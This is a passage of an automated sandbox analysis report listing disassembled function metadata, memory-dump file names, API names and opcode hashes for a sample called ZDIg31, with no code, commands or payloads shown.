                                      • Instruction Fuzzy Hash: 4F41A062E29A4982DB30DF66E4443AA77A1FB88794F444131EE4E877B8DF3CD641CB50
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID: csm
                                      • API String ID: 3997070919-1018135373
                                      • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                      • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                      • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                      • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                      APIs
                                        • Part of subcall function 00007FFE9B903A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE9B903A63
                                      • __GSHandlerCheckCommon.LIBCMT ref: 00007FFE9B910993
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CheckCommonHandler__except_validate_context_record
                                      • String ID: csm$f
                                      • API String ID: 1543384424-629598281
                                      • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                      • Instruction ID: a6dc71d02a87277e6dfffa35a0f867bbab957b5f6483af19ca66a8932525c768
                                      • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                      • Instruction Fuzzy Hash: 8D11D372E2878985E720AF22E5411AD7764FB49FC4F088135EF881BB76CE39DA51D710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: TimerWaitable
                                      • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                      • API String ID: 1823812067-484248852
                                      • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                      • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                      • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                      • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                      APIs
                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE9B90112F), ref: 00007FFE9B9039E0
                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE9B90112F), ref: 00007FFE9B903A21
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: ExceptionFileHeaderRaise
                                      • String ID: csm
                                      • API String ID: 2573137834-1018135373
                                      • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                      • Instruction ID: aa55b543b4862453c414d9c4081f2c4b45fb2d28a1ccedd6de46942288a5b8c6
                                      • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                      • Instruction Fuzzy Hash: B1112B32A28B8582EB218F25E44026977E5FB88B88F584230DE9D17B79DF3CD651CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: TimerWaitable
                                      • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                      • API String ID: 1823812067-3336177065
                                      • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                      • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                      • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                      • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                      • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                      • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                      • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710